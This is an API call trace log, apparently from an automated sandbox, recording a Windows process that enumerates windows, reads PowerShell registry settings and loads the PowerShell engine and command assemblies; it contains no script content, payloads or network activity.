	[0413.245] GetWindowThreadProcessId (in: hWnd=0x201ca, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x940
	[0413.245] GetWindowThreadProcessId (in: hWnd=0x201d8, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x93c
	[0413.245] GetWindowThreadProcessId (in: hWnd=0x301e2, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x4ec
	[0413.245] GetWindowThreadProcessId (in: hWnd=0x201de, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x150
	[0413.245] GetWindowThreadProcessId (in: hWnd=0x201c8, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x720
	[0413.245] GetWindowThreadProcessId (in: hWnd=0x301f4, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x3c4
	[0413.245] GetWindowThreadProcessId (in: hWnd=0x301c0, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x7d4
	[0413.245] GetWindowThreadProcessId (in: hWnd=0x301c4, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x6c8
	[0413.246] GetWindowThreadProcessId (in: hWnd=0x4011e, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0xb54
	[0413.246] GetWindowThreadProcessId (in: hWnd=0x50122, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0xb54
	[0413.246] GetWindowThreadProcessId (in: hWnd=0x501b8, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0xb5c
	[0413.246] GetWindowThreadProcessId (in: hWnd=0x101b2, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x838
	[0413.246] GetWindowThreadProcessId (in: hWnd=0x101ae, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x818
	[0413.246] GetWindowThreadProcessId (in: hWnd=0x101aa, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x5b8
	[0413.246] GetWindowThreadProcessId (in: hWnd=0x101a6, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x494
	[0413.246] GetWindowThreadProcessId (in: hWnd=0x101a2, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x1ec
	[0413.246] GetWindowThreadProcessId (in: hWnd=0x1019e, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x440
	[0413.246] GetWindowThreadProcessId (in: hWnd=0x1019a, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x7e8
	[0413.247] GetWindowThreadProcessId (in: hWnd=0x10196, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x730
	[0413.247] GetWindowThreadProcessId (in: hWnd=0x10192, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x2c8
	[0413.247] GetWindowThreadProcessId (in: hWnd=0x1018e, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x31c
	[0413.247] GetWindowThreadProcessId (in: hWnd=0x1018a, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x330
	[0413.247] GetWindowThreadProcessId (in: hWnd=0x10186, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x128
	[0413.247] GetWindowThreadProcessId (in: hWnd=0x10182, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x5c8
	[0413.247] GetWindowThreadProcessId (in: hWnd=0x1017e, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x6f8
	[0413.247] GetWindowThreadProcessId (in: hWnd=0x1017a, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x358
	[0413.247] GetWindowThreadProcessId (in: hWnd=0x10176, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x73c
	[0413.247] GetWindowThreadProcessId (in: hWnd=0x10172, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0xb0
	[0413.247] GetWindowThreadProcessId (in: hWnd=0x1016e, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x250
	[0413.248] GetWindowThreadProcessId (in: hWnd=0x1016a, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x240
	[0413.248] GetWindowThreadProcessId (in: hWnd=0x20160, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x790
	[0413.248] GetWindowThreadProcessId (in: hWnd=0x70110, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x61c
	[0413.248] GetWindowThreadProcessId (in: hWnd=0x1013a, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x568
	[0413.248] GetWindowThreadProcessId (in: hWnd=0x10132, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x538
	[0413.248] GetWindowThreadProcessId (in: hWnd=0x10128, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x540
	[0413.248] GetWindowThreadProcessId (in: hWnd=0x20104, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x460
	[0413.248] GetWindowThreadProcessId (in: hWnd=0x2002a, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x79c
	[0413.248] GetWindowThreadProcessId (in: hWnd=0x1005a, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x4e0
	[0413.248] GetWindowThreadProcessId (in: hWnd=0x10048, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x460
	[0413.249] GetWindowThreadProcessId (in: hWnd=0x2001a, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x778
	[0413.252] WerSetFlags () returned 0x0
	[0413.260] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1
	[0413.640] CoTaskMemFree (pv=0x0) 
	[0413.641] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x24dc88, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x24dc80 | out: pulNumLanguages=0x24dc88, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x24dc80) returned 1
	[0413.641] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x24dc88, pwszLanguagesBuffer=0x2cec510, pcchLanguagesBuffer=0x24dc80 | out: pulNumLanguages=0x24dc88, pwszLanguagesBuffer=0x2cec510, pcchLanguagesBuffer=0x24dc80) returned 1
	[0413.646] CoTaskMemAlloc (cb=0x24) returned 0x46f100
	[0413.646] GetUserDefaultLocaleName (in: lpLocaleName=0x46f100, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6
	[0413.647] CoTaskMemFree (pv=0x46f100) 
	[0413.670] CoTaskMemAlloc (cb=0x104) returned 0x3c6320
	[0413.670] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c6320, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0413.670] CoTaskMemFree (pv=0x3c6320) 
	[0413.672] CoTaskMemAlloc (cb=0x104) returned 0x3c6320
	[0413.672] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c6320, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0413.672] CoTaskMemFree (pv=0x3c6320) 
	[0413.674] CoTaskMemAlloc (cb=0x104) returned 0x3c6320
	[0413.674] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c6320, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0413.674] CoTaskMemFree (pv=0x3c6320) 
	[0414.018] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0414.018] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0414.018] SetErrorMode (uMode=0x1) returned 0x1
	[0414.018] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x24d900 | out: lpFileInformation=0x24d900*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0414.018] SetErrorMode (uMode=0x1) returned 0x1
	[0414.018] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x24db70 | out: lpdwHandle=0x24db70) returned 0x94c
	[0414.019] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2cefda0 | out: lpData=0x2cefda0) returned 1
	[0414.020] VerQueryValueW (in: pBlock=0x2cefda0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x24dae8, puLen=0x24dae0 | out: lplpBuffer=0x24dae8*=0x2cefe3c, puLen=0x24dae0) returned 1
	[0414.020] VerQueryValueW (in: pBlock=0x2cefda0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x24da58, puLen=0x24da50 | out: lplpBuffer=0x24da58*=0x2ceff18, puLen=0x24da50) returned 1
	[0414.020] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0414.020] CoTaskMemAlloc (cb=0x2e) returned 0x47ac80
	[0414.020] lstrcpyW (in: lpString1=0x47ac80, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0414.020] CoTaskMemFree (pv=0x47ac80) 
	[0414.021] VerQueryValueW (in: pBlock=0x2cefda0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x24da58, puLen=0x24da50 | out: lplpBuffer=0x24da58*=0x2ceff6c, puLen=0x24da50) returned 1
	[0414.021] lstrlenW (lpString="System.Management.Automation") returned 28
	[0414.021] CoTaskMemAlloc (cb=0x3c) returned 0x3f90c0
	[0414.021] lstrcpyW (in: lpString1=0x3f90c0, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0414.021] CoTaskMemFree (pv=0x3f90c0) 
	[0414.021] VerQueryValueW (in: pBlock=0x2cefda0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x24da58, puLen=0x24da50 | out: lplpBuffer=0x24da58*=0x2ceffc8, puLen=0x24da50) returned 1
	[0414.021] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0414.021] CoTaskMemAlloc (cb=0x20) returned 0x477120
	[0414.021] lstrcpyW (in: lpString1=0x477120, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0414.021] CoTaskMemFree (pv=0x477120) 
	[0414.021] VerQueryValueW (in: pBlock=0x2cefda0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x24da58, puLen=0x24da50 | out: lplpBuffer=0x24da58*=0x2cf0008, puLen=0x24da50) returned 1
	[0414.021] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0414.021] CoTaskMemAlloc (cb=0x44) returned 0x3f90c0
	[0414.021] lstrcpyW (in: lpString1=0x3f90c0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0414.021] CoTaskMemFree (pv=0x3f90c0) 
	[0414.021] VerQueryValueW (in: pBlock=0x2cefda0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x24da58, puLen=0x24da50 | out: lplpBuffer=0x24da58*=0x2cf0070, puLen=0x24da50) returned 1
	[0414.021] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0414.021] CoTaskMemAlloc (cb=0x76) returned 0x420d80
	[0414.021] lstrcpyW (in: lpString1=0x420d80, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0414.021] CoTaskMemFree (pv=0x420d80) 
	[0414.021] VerQueryValueW (in: pBlock=0x2cefda0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x24da58, puLen=0x24da50 | out: lplpBuffer=0x24da58*=0x2cf010c, puLen=0x24da50) returned 1
	[0414.021] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0414.021] CoTaskMemAlloc (cb=0x44) returned 0x3f90c0
	[0414.021] lstrcpyW (in: lpString1=0x3f90c0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0414.021] CoTaskMemFree (pv=0x3f90c0) 
	[0414.021] VerQueryValueW (in: pBlock=0x2cefda0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x24da58, puLen=0x24da50 | out: lplpBuffer=0x24da58*=0x2cf0170, puLen=0x24da50) returned 1
	[0414.021] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0414.021] CoTaskMemAlloc (cb=0x58) returned 0x446420
	[0414.021] lstrcpyW (in: lpString1=0x446420, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0414.021] CoTaskMemFree (pv=0x446420) 
	[0414.022] VerQueryValueW (in: pBlock=0x2cefda0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x24da58, puLen=0x24da50 | out: lplpBuffer=0x24da58*=0x2cf01ec, puLen=0x24da50) returned 1
	[0414.022] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0414.022] CoTaskMemAlloc (cb=0x20) returned 0x477120
	[0414.022] lstrcpyW (in: lpString1=0x477120, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0414.022] CoTaskMemFree (pv=0x477120) 
	[0414.022] VerQueryValueW (in: pBlock=0x2cefda0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x24da58, puLen=0x24da50 | out: lplpBuffer=0x24da58*=0x2cefe94, puLen=0x24da50) returned 1
	[0414.022] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0414.022] CoTaskMemAlloc (cb=0x66) returned 0x469df0
	[0414.022] lstrcpyW (in: lpString1=0x469df0, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0414.022] CoTaskMemFree (pv=0x469df0) 
	[0414.022] VerQueryValueW (in: pBlock=0x2cefda0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x24da58, puLen=0x24da50 | out: lplpBuffer=0x24da58*=0x0, puLen=0x24da50) returned 0
	[0414.022] VerQueryValueW (in: pBlock=0x2cefda0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x24da58, puLen=0x24da50 | out: lplpBuffer=0x24da58*=0x0, puLen=0x24da50) returned 0
	[0414.022] VerQueryValueW (in: pBlock=0x2cefda0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x24da58, puLen=0x24da50 | out: lplpBuffer=0x24da58*=0x0, puLen=0x24da50) returned 0
	[0414.022] VerQueryValueW (in: pBlock=0x2cefda0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x24da28, puLen=0x24da20 | out: lplpBuffer=0x24da28*=0x2cefe3c, puLen=0x24da20) returned 1
	[0414.022] CoTaskMemAlloc (cb=0x204) returned 0x4238e0
	[0414.022] VerLanguageNameW (in: wLang=0x0, szLang=0x4238e0, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0414.022] CoTaskMemFree (pv=0x4238e0) 
	[0414.022] VerQueryValueW (in: pBlock=0x2cefda0, lpSubBlock="\\", lplpBuffer=0x24da78, puLen=0x24da70 | out: lplpBuffer=0x24da78*=0x2cefdc8, puLen=0x24da70) returned 1
	[0414.031] CoTaskMemAlloc (cb=0x104) returned 0x3c6320
	[0414.031] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c6320, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0414.031] CoTaskMemFree (pv=0x3c6320) 
	[0414.036] CoTaskMemAlloc (cb=0x104) returned 0x3c6320
	[0414.036] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c6320, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0414.036] CoTaskMemFree (pv=0x3c6320) 
	[0414.040] lstrlenW (lpString="䅁") returned 1
	[0414.057] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d948 | out: phkResult=0x24d948*=0x2f0) returned 0x0
	[0414.392] RegOpenKeyExW (in: hKey=0x2f0, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d938 | out: phkResult=0x24d938*=0x2f4) returned 0x0
	[0414.392] RegOpenKeyExW (in: hKey=0x2f4, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d9c8 | out: phkResult=0x24d9c8*=0x2f8) returned 0x0
	[0414.397] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d90c, lpData=0x0, lpcbData=0x24d908*=0x0 | out: lpType=0x24d90c*=0x1, lpData=0x0, lpcbData=0x24d908*=0x56) returned 0x0
	[0414.397] CoTaskMemAlloc (cb=0x5a) returned 0x469d80
	[0414.398] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d8dc, lpData=0x469d80, lpcbData=0x24d8d8*=0x56 | out: lpType=0x24d8dc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x24d8d8*=0x56) returned 0x0
	[0414.398] CoTaskMemFree (pv=0x469d80) 
	[0414.404] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0414.406] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0414.412] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0414.430] CoTaskMemAlloc (cb=0x104) returned 0x3c6320
	[0414.430] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c6320, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0414.430] CoTaskMemFree (pv=0x3c6320) 
	[0415.869] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x24d500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0415.870] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x24d500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0416.708] CoTaskMemAlloc (cb=0x104) returned 0x4856e0
	[0416.708] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4856e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0416.708] CoTaskMemFree (pv=0x4856e0) 
	[0416.709] CoTaskMemAlloc (cb=0x104) returned 0x4856e0
	[0416.709] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4856e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0416.709] CoTaskMemFree (pv=0x4856e0) 
	[0417.024] CoTaskMemAlloc (cb=0x104) returned 0x4856e0
	[0417.024] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4856e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0417.025] CoTaskMemFree (pv=0x4856e0) 
	[0417.026] CoTaskMemAlloc (cb=0x104) returned 0x4856e0
	[0417.026] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4856e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0417.026] CoTaskMemFree (pv=0x4856e0) 
	[0417.027] CoTaskMemAlloc (cb=0x104) returned 0x4856e0
	[0417.027] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4856e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0417.027] CoTaskMemFree (pv=0x4856e0) 
	[0418.047] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x24d500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0418.047] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x24d500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0418.068] CoTaskMemAlloc (cb=0x104) returned 0x47d450
	[0418.068] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x47d450, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0418.068] CoTaskMemFree (pv=0x47d450) 
	[0418.071] CoTaskMemAlloc (cb=0x104) returned 0x47d450
	[0418.071] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x47d450, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0418.071] CoTaskMemFree (pv=0x47d450) 
	[0418.649] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.649] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0424.034] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x24d500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0424.034] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x24d500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0425.180] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0425.181] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0425.546] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x24d500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0425.546] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x24d500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0426.352] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x24d500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
